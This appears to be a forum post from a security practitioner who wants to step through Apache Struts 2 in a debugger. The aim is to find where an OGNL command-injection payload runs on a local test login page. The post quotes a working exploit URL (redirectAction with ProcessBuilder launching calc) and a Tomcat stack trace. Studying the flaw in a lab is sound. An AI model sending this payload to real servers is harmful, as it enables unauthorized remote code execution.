Goal: I am in the info sec space and am not a programmer. I have setup a small environment which is working as it should. However, I want to walk the jars to see exactly what class and method is allowing the command injection.

Env: Struts, Apache, JSP, eclipse. I'm using running a struts hello world style login page which is working normally.

I'm able to "debug on server" and walk the attached struts source. The problem is when I send the exploit parameters in the url I am instantly presented with server 500 error.

What I need: How so I use the debugger in conjuction with sending this url to see exactly where the null pointer is happening?

This pops calc

http://localhost:8080/StrutsHelloWorld/login.action?redirectAction:%25{(new+java.lang.Pro cessBuilder(new+java.lang.String[]{'calc'})).start()}


type Exception report


description The server encountered an internal error () that prevented it from fulfilling this request.


org.apache.struts2.impl.StrutsActionProxy.getError Message(StrutsActionProxy.java:69)
com.opensymphony.xwork2.DefaultActionProxy.prepare (DefaultActionProxy.java:185)
org.apache.struts2.impl.StrutsActionProxy.prepare( StrutsActionProxy.java:63)
org.apache.struts2.impl.StrutsActionProxyFactory.c reateActionProxy(StrutsActionProxyFactory.java:39)
com.opensymphony.xwork2.DefaultActionProxyFactory. createActionProxy(DefaultActionProxyFactory.java:5 8)
org.apache.struts2.dispatcher.Dispatcher.serviceAc tion(Dispatcher.java:500)
org.apache.struts2.dispatcher.FilterDispatcher.doF ilter(FilterDispatcher.java:434)

note The full stack trace of the root cause is available in the Apache Tomcat/6.0.32 logs.